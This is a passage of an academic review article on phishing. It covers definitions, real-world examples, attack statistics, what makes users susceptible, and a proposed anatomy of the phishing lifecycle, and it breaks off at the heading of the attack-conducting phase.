phishing research report

REVIEW article

Phishing attacks: a recent comprehensive study and a new anatomy.

Cardiff School of Technologies, Cardiff Metropolitan University, Cardiff, United Kingdom

With the significant growth of internet usage, people increasingly share their personal information online. As a result, an enormous amount of personal information and financial transactions become vulnerable to cybercriminals. Phishing is an example of a highly effective form of cybercrime that enables criminals to deceive users and steal important data. Since the first reported phishing attack in 1990, it has been evolved into a more sophisticated attack vector. At present, phishing is considered one of the most frequent examples of fraud activity on the Internet. Phishing attacks can lead to severe losses for their victims including sensitive information, identity theft, companies, and government secrets. This article aims to evaluate these attacks by identifying the current state of phishing and reviewing existing phishing techniques. Studies have classified phishing attacks according to fundamental phishing mechanisms and countermeasures discarding the importance of the end-to-end lifecycle of phishing. This article proposes a new detailed anatomy of phishing which involves attack phases, attacker’s types, vulnerabilities, threats, targets, attack mediums, and attacking techniques. Moreover, the proposed anatomy will help readers understand the process lifecycle of a phishing attack which in turn will increase the awareness of these phishing attacks and the techniques being used; also, it helps in developing a holistic anti-phishing system. Furthermore, some precautionary countermeasures are investigated, and new strategies are suggested.

Introduction

The digital world is rapidly expanding and evolving, and likewise, as are cybercriminals who have relied on the illegal use of digital assets—especially personal information—for inflicting damage to individuals. One of the most threatening crimes of all internet users is that of ‘identity theft’ ( Ramanathan and Wechsler, 2012 ) which is defined as impersonating the person’s identity to steal and use their personal information (i.e., bank details, social security number, or credit card numbers, etc.) by an attacker for the individuals’ own gain not just for stealing money but also for committing other crimes ( Arachchilage and Love, 2014 ). Cyber criminals have also developed their methods for stealing their information, but social-engineering-based attacks remain their favorite approach. One of the social engineering crimes that allow the attacker to perform identity theft is called a phishing attack. Phishing has been one of the biggest concerns as many internet users fall victim to it. It is a social engineering attack wherein a phisher attempts to lure the users to obtain their sensitive information by illegally utilizing a public or trustworthy organization in an automated pattern so that the internet user trusts the message, and reveals the victim’s sensitive information to the attacker ( Jakobsson and Myers, 2006 ). In phishing attacks, phishers use social engineering techniques to redirect users to malicious websites after receiving an email and following an embedded link ( Gupta et al., 2015 ). Alternatively, attackers could exploit other mediums to execute their attacks such as Voice over IP (VoIP), Short Message Service (SMS) and, Instant Messaging (IM) ( Gupta et al., 2015 ). Phishers have also turned from sending mass-email messages, which target unspecified victims, into more selective phishing by sending their emails to specific victims, a technique called “spear-phishing.”

Cybercriminals usually exploit users with a lack of digital/cyber ethics or who are poorly trained in addition to technical vulnerabilities to reach their goals. Susceptibility to phishing varies between individuals according to their attributes and awareness level, therefore, in most attacks, phishers exploit human nature for hacking, instead of utilising sophisticated technologies. Even though the weakness in the information security chain is attributed to humans more than the technology, there is a lack of understanding about which ring in this chain is first penetrated. Studies found that certain personal characteristics make some persons more receptive to various lures ( Iuga et al., 2016 ; Ovelgönne et al., 2017 ; Crane, 2019 ). For example, individuals who usually obey authorities more than others are more likely to fall victim to a Business Email Compromise (BEC) that is pretending to be from a financial institution and requests immediate action by seeing it as a legitimate email ( Barracuda, 2020 ). Greediness is another human weakness that could be used by an attacker, for example, emails that offering either great discounts, free gift cards, and others ( Workman, 2008 ).

Various channels are used by the attacker to lure the victim through a scam or through an indirect manner to deliver a payload for gaining sensitive and personal information from the victim ( Ollmann, 2004 ). However, phishing attacks have already led to damaging losses and could affect the victim not only through a financial context but could also have other serious consequences such as loss of reputation, or compromise of national security ( Ollmann, 2004 ; Herley and Florêncio, 2008 ). Cybercrime damages have been expected to cost the world $6 trillion annually by 2021, up from $3 trillion in 2015 according to Cybersecurity Ventures ( Morgan, 2019 ). Phishing attacks are the most common type of cybersecurity breaches as stated by the official statistics from the cybersecurity breaches survey 2020 in the United Kingdom ( GOV.UK, 2020 ). Although these attacks affect organizations and individuals alike, the loss for the organizations is significant, which includes the cost for recovery, the loss of reputation, fines from information laws/regulations, and reduced productivity ( Medvet et al., 2008 ).

Phishing is a field of study that merges social psychology, technical systems, security subjects, and politics. Phishing attacks are more prevalent: a recent study ( Proofpoint, 2020 ) found that nearly 90% of organizations faced targeted phishing attacks in 2019. From which 88% experienced spear-phishing attacks, 83% faced voice phishing (Vishing), 86% dealt with social media attacks, 84% reported SMS/text phishing (SMishing), and 81% reported malicious USB drops. The 2018 Proofpoint 1 annual report ( Proofpoint, 2019a ) has stated that phishing attacks jumped from 76% in 2017 to 83% in 2018, where all phishing types happened more frequently than in 2017. The number of phishing attacks identified in the second quarter of 2019 was notably higher than the number recorded in the previous three quarters. While in the first quarter of 2020, this number was higher than it was in the previous one according to a report from Anti-Phishing Working Group (APWG 2 ) ( APWG, 2018 ) which confirms that phishing attacks are on the rise. These findings have shown that phishing attacks have increased continuously in recent years and have become more sophisticated and have gained more attention from cyber researchers and developers to detect and mitigate their impact. This article aims to determine the severity of the phishing problem by providing detailed insights into the phishing phenomenon in terms of phishing definitions, current statistics, anatomy, and potential countermeasures.

The rest of the article is organized as follows. Phishing Definitions provides a number of phishing definitions as well as some real-world examples of phishing. The evolution and development of phishing attacks are discussed in Developing a Phishing Campaign . What Attributes Make Some People More Susceptible to Phishing Attacks Than Others explores the susceptibility to these attacks. The proposed phishing anatomy and types of phishing attacks are elaborated in Proposed Phishing Anatomy . In Countermeasures , various anti-phishing countermeasures are discussed. The conclusions of this study are drawn in Conclusion .

Phishing Definitions

Various definitions for the term “phishing” have been proposed and discussed by experts, researchers, and cybersecurity institutions. Although there is no established definition for the term “phishing” due to its continuous evolution, this term has been defined in numerous ways based on its use and context. The process of tricking the recipient to take the attacker’s desired action is considered the de facto definition of phishing attacks in general. Some definitions name websites as the only possible medium to conduct attacks. The study ( Merwe et al., 2005 , p. 1) defines phishing as “a fraudulent activity that involves the creation of a replica of an existing web page to fool a user into submitting personal, financial, or password data.” The above definition describes phishing as an attempt to scam the user into revealing sensitive information such as bank details and credit card numbers, by sending malicious links to the user that leads to the fake web establishment. Others name emails as the only attack vector. For instance, PishTank (2006) defines phishing as “a fraudulent attempt, usually made through email, to steal your personal information.” A description for phishing stated by ( Kirda and Kruegel, 2005 , p.1) defines phishing as “a form of online identity theft that aims to steal sensitive information such as online banking passwords and credit card information from users.” Some definitions highlight the usage of combined social and technical skills. For instance, APWG defines phishing as “a criminal mechanism employing both social engineering and technical subterfuge to steal consumers’ personal identity data and financial account credentials” ( APWG, 2018 , p. 1). Moreover, the definition from the United States Computer Emergency Readiness Team (US-CERT) states phishing as “a form of social engineering that uses email or malicious websites (among other channels) to solicit personal information from an individual or company by posing as a trustworthy organization or entity” ( CISA, 2018 ). A detailed definition has been presented in ( Jakobsson and Myers, 2006 , p. 1), which describes phishing as “a form of social engineering in which an attacker, also known as a phisher, attempts to fraudulently retrieve legitimate users’ confidential or sensitive credentials by mimicking electronic communications from a trustworthy or public organization in an automated fashion. Such communications are most frequently done through emails that direct users to fraudulent websites that in turn collect the credentials in question.”

In order to understand the anatomy of the phishing attack, there is a necessity for a clear and detailed definition that underpins previous existent definitions. Since a phishing attack constitutes a mix of technical and social engineering tactics, a new definition (i.e., Anatomy) has been proposed in this article, which describes the complete process of a phishing attack. This provides a better understanding for the readers as it covers phishing attacks in depth from a range of perspectives. Various angles and this might help beginner readers or researchers in this field. To this end, we define phishing as a socio-technical attack, in which the attacker targets specific valuables by exploiting an existing vulnerability to pass a specific threat via a selected medium into the victim’s system, utilizing social engineering tricks or some other techniques to convince the victim into taking a specific action that causes various types of damages.

Figure 1 depicts the general process flow for a phishing attack that contains four phases; these phases are elaborated in Proposed Phishing Anatomy . However, as shown in Figure 1 , in most attacks, the phishing process is initiated by gathering information about the target. Then the phisher decides which attack method is to be used in the attack as initial steps within the planning phase. The second phase is the preparation phase, in which the phisher starts to search for vulnerabilities through which he could trap the victim. The phisher conducts his attack in the third phase and waits for a response from the victim. In turn, the attacker could collect the spoils in the valuables acquisition phase, which is the last step in the phishing process. To elaborate the above phishing process using an example, an attacker may send a fraudulent email to an internet user pretending to be from the victim’s bank, requesting the user to confirm the bank account details, or else the account may be suspended. The user may think this email is legitimate since it uses the same graphic elements, trademarks, and colors of their legitimate bank. Submitted information will then be directly transmitted to the phisher who will use it for different malicious purposes such as money withdrawal, blackmailing, or committing further frauds.

FIGURE 1 . General phishing attack process.

Real-World Phishing Examples

Some real-world examples of phishing attacks are discussed in this section to present the complexity of some recent phishing attacks. Figure 2 shows the screenshot of a suspicious phishing email that passed a University’s spam filters and reached the recipient mailbox. As shown in Figure 2 , the phisher uses the sense of importance or urgency in the subject through the word ‘important,’ so that the email can trigger a psychological reaction in the user to prompt them into clicking the button “View message.” The email contains a suspicious embedded button, indeed, when hovering over this embedded button, it does not match with Uniform Resource Locator (URL) in the status bar. Another clue in this example is that the sender's address is questionable and not known to the receiver. Clicking on the fake attachment button will result in either installation of a virus or worm onto the computer or handing over the user’s credentials by redirecting the victim onto a fake login page.

FIGURE 2 . Screenshot of a real suspicious phishing email received by the authors’ institution in February 2019.

More recently, phishers take advantage of the Coronavirus pandemic (COVID-19) to fool their prey. Many Coronavirus-themed scam messages sent by attackers exploited people’s fear of contracting COVID-19 and urgency to look for information related to Coronavirus (e.g., some of these attacks are related to Personal Protective Equipment (PPE) such as facemasks), the WHO stated that COVID-19 has created an Infodemic which is favorable for phishers ( Hewage, 2020 ). Cybercriminals also lured people to open attachments claiming that it contains information about people with Coronavirus within the local area.

Figure 3 shows an example of a phishing e-mail where the attacker claimed to be the recipient’s neighbor sending a message in which they pretended to be dying from the virus and threatening to infect the victim unless a ransom was paid ( Ksepersky, 2020 ).

FIGURE 3 . Screenshot of a coronavirus related phishing email ( Ksepersky, 2020 ).

Another example is the phishing attack spotted by a security researcher at Akamai organization in January 2019. The attack attempted to use Google Translate to mask suspicious URLs, prefacing them with the legit-looking “ www.translate.google.com ” address to dupe users into logging in ( Rhett, 2019 ). That attack followed with Phishing scams asking for Netflix payment detail for example, or embedded in promoted tweets that redirect users to genuine-looking PayPal login pages. Although the tricky/bogus page was very well designed in the latter case, the lack of a Hypertext Transfer Protocol Secure (HTTPS) lock and misspellings in the URL were key red flags (or giveaways) that this was actually a phishing attempt ( Keck, 2018 ). Figure 4A shows a screenshot of a phishing email received by the Federal Trade Commission (FTC). The email promotes the user to update his payment method by clicking on a link, pretending that Netflix is having a problem with the user's billing information ( FTC, 2018 ).

FIGURE 4 . Screenshot of the (A) Netflix scam email and (B) fraudulent text message (Apple) ( Keck, 2018 ; Rhett, 2019 )

Figure 4B shows a text message as another example of phishing that is difficult to spot as a fake text message ( Pompon et al., 2018 ). The text message shown appears to come from Apple asking the customer to update the victim’s account. A sense of urgency is used in the message as a lure to motivate the user to respond.

Developing a Phishing Campaign

Today, phishing is considered one of the most pressing cybersecurity threats for all internet users, regardless of their technical understanding and how cautious they are. These attacks are getting more sophisticated by the day and can cause severe losses to the victims. Although the attacker’s first motivation is stealing money, stolen sensitive data can be used for other malicious purposes such as infiltrating sensitive infrastructures for espionage purposes. Therefore, phishers keep on developing their techniques over time with the development of electronic media. The following sub-sections discuss phishing evolution and the latest statistics.

Historical Overview

Cybersecurity has been a major concern since the beginning of APRANET, which is considered to be the first wide-area packet-switching network with distributed control and one of the first networks to implement the TCP/IP protocol suite. The term “Phishing” which was also called carding or brand spoofing, was coined for the first time in 1996 when the hackers created randomized credit card numbers using an algorithm to steal users' passwords from America Online (AOL) ( Whitman and Mattord, 2012 ; Cui et al., 2017 ). Then phishers used instant messages or emails to reach users by posing as AOL employees to convince users to reveal their passwords. Attackers believed that requesting customers to update their account would be an effective way to disclose their sensitive information, thereafter, phishers started to target larger financial companies. The author in ( Ollmann, 2004 ) believes that the “ph” in phishing comes from the terminology “Phreaks” which was coined by John Draper, who was also known as Captain Crunch, and was used by early Internet criminals when they phreak telephone systems. Where the “f” in ‘fishing’ replaced with “ph” in “Phishing” as they both have the same meaning by phishing the passwords and sensitive information from the sea of internet users. Over time, phishers developed various and more advanced types of scams for launching their attack. Sometimes, the purpose of the attack is not limited to stealing sensitive information, but it could involve injecting viruses or downloading the malicious program into a victim's computer. Phishers make use of a trusted source (for instance a bank helpdesk) to deceive victims so that they disclose their sensitive information ( Ollmann, 2004 ).

Phishing attacks are rapidly evolving, and spoofing methods are continuously changing as a response to new corresponding countermeasures. Hackers take advantage of new tool-kits and technologies to exploit systems’ vulnerabilities and also use social engineering techniques to fool unsuspecting users. Therefore, phishing attacks continue to be one of the most successful cybercrime attacks.

The Latest Statistics of Phishing Attacks

Phishing attacks are becoming more common and they are significantly increasing in both sophistication and frequency. Lately, phishing attacks have appeared in various forms. Different channels and threats are exploited and used by the attackers to trap more victims. These channels could be social networks or VoIP, which could carry various types of threats such as malicious attachments, embedded links within an email, instant messages, scam calls, or other types. Criminals know that social engineering-based methods are effective and profitable; therefore, they keep focusing on social engineering attacks, as it is their favorite weapon, instead of concentrating on sophisticated techniques and toolkits. Phishing attacks have reached unprecedented levels especially with emerging technologies such as mobile and social media ( Marforio et al., 2015 ). For instance, from 2017 to 2020, phishing attacks have increased from 72 to 86% among businesses in the United Kingdom in which a large proportion of the attacks are originated from social media ( GOV.UK, 2020 ).

The APWG Phishing Activity Trends Report analyzes and measures the evolution, proliferation, and propagation of phishing attacks reported to the APWG. Figure 5 shows the growth in phishing attacks from 2015 to 2020 by quarters based on APWG annual reports ( APWG, 2020 ). As demonstrated in Figure 5 , in the third quarter of 2019, the number of phishing attacks rose to 266,387, which is the highest level in three years since late 2016. This was up 46% from the 182,465 for the second quarter, and almost double the 138,328 seen in the fourth quarter of 2018. The number of unique phishing e-mails reported to APWG in the same quarter was 118,260. Furthermore, it was found that the number of brands targeted by phishing campaigns was 1,283.

FIGURE 5 . The growth in phishing attacks 2015–2020 by quarters based on data collected from APWG annual reports.

Cybercriminals are always taking advantage of disasters and hot events for their own gains. With the beginning of the COVID-19 crisis, a variety of themed phishing and malware attacks have been launched by phishers against workers, healthcare facilities, and even the general public. A report from Microsoft ( Microsoft, 2020 ) showed that cyber-attacks related to COVID-19 had spiked to an unprecedented level in March, most of these scams are fake COVID-19 websites according to security company RiskIQ ( RISKIQ, 2020 ). However, the total number of phishing attacks observed by APWG in the first quarter of 2020 was 165,772, up from the 162,155 observed in the fourth quarter of 2019. The number of these unique phishing reports submitted to APWG during the first quarter of 2020 was 139,685, up from 132,553 in the fourth quarter of 2019, 122,359 in the third quarter of 2019, and 112,163 in the second quarter of 2019 ( APWG, 2020 ).

A study ( KeepnetLABS, 2018 ) confirmed that more than 91% of system breaches are caused by attacks initiated by email. Although cybercriminals use email as the main medium for leveraging their attacks, many organizations faced a high volume of different social engineering attacks in 2019 such as Social Media Attacks, Smishing Attacks, Vishing Attacks, USB-based Attacks (for example by hiding and delivering malware to smartphones via USB phone chargers and distributing malware-laden free USBs) ( Proofpoint, 2020 ). However, info-security professionals reported a higher frequency of all types of social engineering attacks year-on-year according to a report presented by Proofpoint. Spear phishing increased to 64% in 2018 from 53% in 2017, Vishing and/or SMishing increased to 49% from 45%, and USB attacks increased to 4% from 3%. The positive side shown in this study is that 59% of suspicious emails reported by end-users were classified as potential phishing, indicating that employees are being more security-aware, diligent, and thoughtful about the emails they receive ( Proofpoint, 2019a ). In all its forms, phishing can be one of the easiest cyber attacks to fall for. With the increasing levels of different phishing types, a survey was conducted by Proofpoint to identify the strengths and weaknesses of particular regions in terms of specific fundamental cybersecurity concepts. In this study, several questions were asked of 7,000 end-users about the identification of multiple terms like phishing, ransomware, SMishing, and Vishing across seven countries; the US, United Kingdom, France, Germany, Italy, Australia, and Japan. The response was different from country to country, where respondents from the United Kingdom recorded the highest knowledge with the term phishing at 70% and the same with the term ransomware at 60%. In contrast, the results showed that the United Kingdom recorded only 18% for each Vishing and SMishing ( Proofpoint, 2019a ), as shown in Table 1 .

TABLE 1 . Percentage of respondents understanding multiple cybersecurity terms from different countries.

On the other hand, a report by Wombat security reflects responses from more than 6,000 working adults about receiving fraudulent solicitation across six countries; the US, United Kingdom, Germany, France, Italy, and Australia ( Ksepersky, 2020 ). Respondents from the United Kingdom stated that they were recipients of fraudulent solicitations through the following sources: email 62%, phone call 27%, text message 16%, mailed letter 8%, social media 10%, and 17% confirmed that they been the victim of identity theft ( Ksepersky, 2020 ). However, the consequences of responding to phishing are serious and costly. For instance, the United Kingdom losses from financial fraud across payment cards, remote banking, and cheques totaled £768.8 million in 2016 ( Financial Fraud Action UK, 2017 ). Indeed, the losses resulting from phishing attacks are not limited to financial losses that might exceed millions of pounds, but also loss of customers and reputation. According to the 2020 state of phish report ( Proofpoint, 2020 ), damages from successful phishing attacks can range from lost productivity to cash outlay. The cost can include; lost hours from employees, remediation time for info security teams’ costs due to incident response, damage to reputation, lost intellectual property, direct monetary losses, compliance fines, lost customers, legal fees, etc.

There are many targets for phishing including end-user, business, financial services (i.e., banks, credit card companies, and PayPal), retail (i.e., eBay, Amazon) and, Internet Service Providers ( wombatsecurity.com, 2018 ). Affected organizations detected by Kaspersky Labs globally in the first quarter of 2020 are demonstrated in Figure 6 . As shown in the figure, online stores were at the top of the targeted list (18.12%) followed by global Internet portals (16.44%) and social networks in third place (13.07%) ( Ksepersky, 2020 ). While the most impersonated brands overall for the first quarter of 2020 were Apple, Netflix, Yahoo, WhatsApp, PayPal, Chase, Facebook, Microsoft eBay, and Amazon ( Checkpoint, 2020 ).

FIGURE 6 . Distribution of organizations affected by phishing attacks detected by Kaspersky in quarter one of 2020.

Phishing attacks can take a variety of forms to target people and steal sensitive information from them. Current data shows that phishing attacks are still effective, which indicates that the available existing countermeasures are not enough to detect and prevent these attacks especially on smart devices. The social engineering element of the phishing attack has been effective in bypassing the existing defenses to date. Therefore, it is essential to understand what makes people fall victim to phishing attacks. What Attributes Make Some People More Susceptible to Phishing Attacks Than Others discusses the human attributes that are exploited by the phishers.

What Attributes Make Some People More Susceptible to Phishing Attacks Than Others

Why do most existing defenses against phishing not work? What personal and contextual attributes make them more susceptible to phishing attacks than other users? Different studies have discussed those two questions and examined the factors affecting susceptibility to a phishing attack and the reasons behind why people get phished. Human nature is considered one of the most affecting factors in the process of phishing. Everyone is susceptible to phishing attacks because phishers play on an individual’s specific psychological/emotional triggers as well as technical vulnerabilities ( KeepnetLABS, 2018 ; Crane, 2019 ). For instance, individuals are likely to click on a link within an email when they see authority cues ( Furnell, 2007 ). In 2017, a report by PhishMe (2017) found that curiosity and urgency were the most common triggers that encourage people to respond to the attack, later these triggers were replaced by entertainment, social media, and reward/recognition as the top emotional motivators. However, in the context of a phishing attack, the psychological triggers often surpass people’s conscious decisions. For instance, when people are working under stress, they tend to make decisions without thinking of the possible consequences and options ( Lininger and Vines, 2005 ). Moreover, everyday stress can damage areas of the brain that weakens the control of their emotions ( Keinan, 1987 ). Several studies have addressed the association between susceptibility to phishing and demographic variables (e.g., age and gender) as an attempt to identify the reasons behind phishing success at different population groups. Although everyone is susceptible to phishing, studies showed that different age groups are more susceptible to certain lures than others are. For example, participants with an age range between 18 and 25 are more susceptible to phishing than other age groups ( Williams et al., 2018 ). The reason that younger adults are more likely to fall for phishing, is that younger adults are more trusting when it comes to online communication, and are also more likely to click on unsolicited e-mails ( Getsafeonline, 2017 ). Moreover, older participants are less susceptible because they tend to be less impulsive ( Arnsten et al., 2012 ). While some studies confirmed that women are more susceptible than men to phishing as they click on links in phishing emails and enter information into phishing websites more often than men do. The study published by Getsafeonline (2017) identifies a lack of technical know-how and experience among women than men as the main reason for this. In contrast, a survey conducted by antivirus company Avast found that men are more susceptible to smartphone malware attacks than women ( Ong, 2014 ). These findings confirmed the results from the study ( Hadlington, 2017 ) that found men are more susceptible to mobile phishing attacks than women. The main reason behind this according to Hadlington (2017) is that men are more comfortable and trusting when using mobile online services. The relationships between demographic characteristics of individualls and their ability to correctly detect a phishing attack have been studied in ( Iuga et al., 2016 ). The study showed that participants with high Personal Computer (PC) usage tend to identify phishing efforts more accurately and faster than other participants. Another study ( Hadlington, 2017 ) showed that internet addiction, attentional, and motor impulsivity were significant positive predictors for risky cybersecurity behaviors while a positive attitude toward cybersecurity in business was negatively related to risky cybersecurity behaviors. On the other hand, the trustworthiness of people in some web sites/platforms is one of the holes that the scammers or crackers exploit especially when it based on visual appearance that could fool the user ( Hadlington, 2017 ). For example, fraudsters take advantage of people’s trust in a website by replacing a letter from the legitimate site with a number such as goog1e.com instead of google.com . Another study ( Yeboah-Boateng and Amanor, 2014 ) demonstrates that although college students are unlikely to disclose personal information as a response to an email, nonetheless they could easily be tricked by other tactics, making them alarmingly susceptible to email phishing attacks. The reason for that is most college students do not have a basis in ICT especially in terms of security. Although security terms like viruses, online scams and worms are known by some end-users, these users could have no knowledge about Phishing, SMishing, and Vishing and others ( Lin et al., 2012 ). However, study ( Yeboah-Boateng and Amanor, 2014 ) shows that younger students are more susceptible than older students, and students who worked full-time were less likely to fall for phishing.

The study reported in ( Diaz et al., 2020 ) examines user click rates and demographics among undergraduates by sending phishing attacks to 1,350 randomly selected students. Students from various disciplines were involved in the test, from engineering and mathematics to arts and social sciences. The study observed that student susceptibility was affected by a range of factors such as phishing awareness, time spent on the computer, cyber training, age, academic year, and college affiliation. The most surprising finding is that those who have greater phishing knowledge are more susceptible to phishing scams. The authors consider two speculations for these unexpected findings. First, user’s awareness about phishing might have been increased with the continuous falling for phishing scams. Second, users who fell for the phish might have less knowledge about phishing than they claim. Other findings from this study agreed with findings from other studies that is, older students were more able to detect a phishing email, and engineering and IT majors had some of the lowest click rates as shown in Figure 7 , which shows that some academic disciplines are more susceptible to phishing than others ( Bailey et al., 2008 ).

FIGURE 7 . The number of clicks on phishing emails by students in the College of Arts, Humanities, and Social Sciences (AHSS), the College of Engineering and Information Technology (EIT), and the College of Natural and Mathematical Sciences (NMS) at the University of Maryland, Baltimore County (UMBC) ( Diaz et al., 2020 ).

Psychological studies have also illustrated that the user’s ability to avoid phishing attacks affected by different factors such as browser security indicators and user's awareness of phishing. The author in ( Dhamija et al., 2006 ) conducted an experimental study using 22 participants to test the user’s ability to recognize phishing websites. The study shows that 90% of these participants became victims of phishing websites and 23% of them ignored security indexes such as the status and address bar. In 2015, another study was conducted for the same purpose, where a number of fake web pages was shown to the participants ( Alsharnouby et al., 2015 ). The results of this study showed that participants detected only 53% of phishing websites successfully. The authors also observed that the time spent on looking at browser elements affected the ability to detect phishing. Lack of knowledge or awareness and carelessness are common causes for making people fall for a phishing trap. Most people have unknowingly opened a suspicious attachment or clicked a fake link that could lead to different levels of compromise. Therefore, focusing on training and preparing users for dealing with such attacks are essential elements to minimize the impact of phishing attacks.

Given the above discussion, susceptibility to phishing varies according to different factors such as age, gender, education level, internet, and PC addiction, etc. Although for each person, there is a trigger that can be exploited by phishers, even people with high experience may fall prey to phishing due to the attack sophistication that makes it difficult to be recognized. Therefore, it is inequitable that the user has always been blamed for falling for these attacks, developers must improve the anti-phishing systems in a way that makes the attack invisible. Understanding the susceptibility of individuals to phishing attacks will help in better developing prevention and detection techniques and solutions.

Proposed Phishing Anatomy

Phishing process overview.

Generally, most of the phishing attacks start with an email ( Jagatic et al., 2007 ). The phishing mail could be sent randomly to potential users or it can be targeted to a specific group or individuals. Many other vectors can also be used to initiate the attack such as phone calls, instant messaging, or physical letters. However, phishing process steps have been discussed by many researchers due to the importance of understanding these steps in developing an anti-phishing solution. The author in the study ( Rouse, 2013 ) divides the phishing attack process into five phases which are planning, setup, attack, collection, and cash. A study ( Jakobsson and Myers, 2006 ) discusses the phishing process in detail and explained it as step-by-step phases. These phases include preparation for the attack, sending a malicious program using the selected vector, obtaining the user’s reaction to the attack, tricking a user to disclose their confidential information which will be transmitted to the phisher, and finally obtaining the targeted money. While the study ( Abad, 2005 ) describes a phishing attack in three phases: the early phase which includes initializing attack, creating the phishing email, and sending a phishing email to the victim. The second phase includes receiving an email by the victim and disclosing their information (in the case of the respondent) and the final phase in which the defrauding is successful. However, all phishing scams include three primary phases, the phisher requests sensitive valuables from the target, and the target gives away these valuables to a phisher, and phisher misuses these valuables for malicious purposes. These phases can be classified furthermore into its sub-processes according to phishing trends. Thus, a new anatomy for phishing attacks has been proposed in this article, which expands and integrates previous definitions to cover the full life cycle of a phishing attack. The proposed new anatomy, which consists of 4 phases, is shown in Figure 8 . This new anatomy provides a reference structure to look at phishing attacks in more detail and also to understand potential countermeasures to prevent them. The explanations for each phase and its components are presented as follows:

FIGURE 8 . The proposed anatomy of phishing was built upon the proposed phishing definition in this article, which concluded from our understanding of a phishing attack.

Figure 8 depicts the proposed anatomy of the phishing attack process, phases, and components drawn upon the proposed definition in this article. The proposed phishing anatomy explains in detail each phase of phishing phases including attackers and target types, examples about the information that could be collected by the attacker about the victim, and examples about attack methods. The anatomy, as shown in the figure, illustrates a set of vulnerabilities that the attacker can exploit and the mediums used to conduct the attack. Possible threats are also listed, as well as the data collection method for a further explanation and some examples about target responding types and types of spoils that the attacker could gain and how they can use the stolen valuables. This anatomy elaborates on phishing attacks in depth which helps people to better understand the complete phishing process (i.e., end to end Phishing life cycle) and boost awareness among readers. It also provides insights into potential solutions for phishing attacks we should focus on. Instead of always placing the user or human in an accusation ring as the only reason behind phishing success, developers must be focusing on solutions to mitigate the initiation of the attack by preventing the bait from reaching the user. For instance, to reach the target’s system, the threat has to pass through many layers of technology or defenses exploiting one or more vulnerabilities such as web and software vulnerabilities.

Planning Phase

This is the first stage of the attack, where a phisher makes a decision about the targets and starts gathering information about them (individuals or company). Phishers gather information about the victims to lure them based on psychological vulnerability. This information can be anything like name, e-mail addresses for individuals, or the customers of that company. Victims could also be selected randomly, by sending mass mailings or targeted by harvesting their information from social media, or any other source. Targets for phishing could be any user with a bank account and has a computer on the Internet. Phishers target businesses such as financial services, retail sectors such as eBay and Amazon, and internet service providers such as MSN/Hotmail, and Yahoo ( Ollmann, 2004 ; Ramzan and Wuest, 2007 ). This phase also includes devising attack methods such as building fake websites (sometimes phishers get a scam page that is already designed or used, designing malware, constructing phishing emails. The attacker can be categorized based on the attack motivation. There are four types of attackers as mentioned in studies ( Vishwanath, 2005 ; Okin, 2009 ; EDUCBA, 2017 ; APWG, 2020 ):

▪ Script kiddies: the term script kiddies represents an attacker with no technical background or knowledge about writing sophisticated programs or developing phishing tools but instead they use scripts developed by others in their phishing attack. Although the term comes from children that use available phishing kits to crack game codes by spreading malware using virus toolkits, it does not relate precisely to the actual age of the phisher. Script kiddies can get access to website administration privileges and commit a “Web cracking” attack. Moreover, they can use hacking tools to compromise remote computers so-called “botnet,” the single compromised computer called a “zombie computer.” These attackers are not limited to just sit back and enjoy phishing, they could cause serious damage such as stealing information or uploading Trojans or viruses. In February 2000, an attack launched by Canadian teen Mike Calce resulted in $1.7 million US Dollars (USD) damages from Distributed Denial of Service (DDoS) attacks on CNN, eBay, Dell, Yahoo, and Amazon ( Leyden, 2001 ).

▪ Serious Crackers: also known as Black Hats. These attackers can execute sophisticated attacks and develop worms and Trojans for their attack. They hijack people's accounts maliciously and steal credit card information, destroy important files, or sell compromised credentials for personal gains.

▪ Organized crime: this is the most organized and effective type of attacker and they can incur significant damage to victims. These people hire serious crackers for conducting phishing attacks. Moreover, they can thoroughly trash the victim's identity, and committing devastated frauds as they have the skills, tools, and manpower. An organized cybercrime group is a team of expert hackers who share their skills to build complex attacks and to launch phishing campaigns against individuals and organizations. These groups offer their work as ‘crime as a service’ and they can be hired by terrorist groups, organizations, or individuals.

▪ Terrorists: due to our dependency on the internet for most activities, terrorist groups can easily conduct acts of terror remotely which could have an adverse impact. These types of attacks are dangerous since they are not in fear of any aftermath, for instance going to jail. Terrorists could use the internet to the maximum effect to create fear and violence as it requires limited funds, resources, and efforts compared to, for example, buying bombs and weapons in a traditional attack. Often, terrorists use spear phishing to launch their attacks for different purposes such as inflicting damage, cyber espionage, gathering information, locating individuals, and other vandalism purposes. Cyber espionage has been used extensively by cyber terrorists to steal sensitive information on national security, commercial information, and trade secrets which can be used for terrorist activities. These types of crimes may target governments or organizations, or individuals.

Attack Preparation

After making a decision about the targets and gathering information about them, phishers start to set up the attack by scanning for the vulnerabilities to exploit. The following are some examples of vulnerabilities exploited by phishers. For example, the attacker might exploit buffer overflow vulnerability to take control of target applications, create a DoS attack, or compromise computers. Moreover, “zero-day” software vulnerabilities, which refer to newly discovered vulnerabilities in software programs or operating systems could be exploited directly before it is fixed ( Kayne, 2019 ). Another example is browser vulnerabilities, adding new features and updates to the browser might introduce new vulnerabilities to the browser software ( Ollmann, 2004 ). In 2005, attackers exploited a cross-domain vulnerability in Internet Explorer (IE) ( Symantic, 2019 ). The cross-domain used to separate content from different sources in Microsoft IE. Attackers exploited a flaw in the cross-domain that enables them to execute programs on a user's computer after running IE. According to US-CERT, hackers are actively exploiting this vulnerability. To carry out a phishing attack, attackers need a medium so that they can reach their target. Therefore, apart from planning the attack to exploit potential vulnerabilities, attackers choose the medium that will be used to deliver the threat to the victim and carry out the attack. These mediums could be the internet (social network, websites, emails, cloud computing, e-banking, mobile systems) or VoIP (phone call), or text messages. For example, one of the actively used mediums is Cloud Computing (CC). The CC has become one of the more promising technologies and has popularly replaced conventional computing technologies. Despite the considerable advantages produced by CC, the adoption of CC faces several controversial obstacles including privacy and security issues ( CVEdetails, 2005 ). Due to the fact that different customers could share the same recourses in the cloud, virtualization vulnerabilities may be exploited by a possible malicious customer to perform security attacks on other customers’ applications and data ( Zissis and Lekkas, 2012 ). For example, in September 2014, secret photos of some celebrities suddenly moved through the internet in one of the more terrible data breaches. The investigation revealed that the iCloud accounts of the celebrities were breached ( Lehman and Vajpayee, 2011 ). According to Proofpoint, in 2017, attackers used Microsoft SharePoint to infect hundreds of campaigns with malware through messages.

Attack Conducting Phase

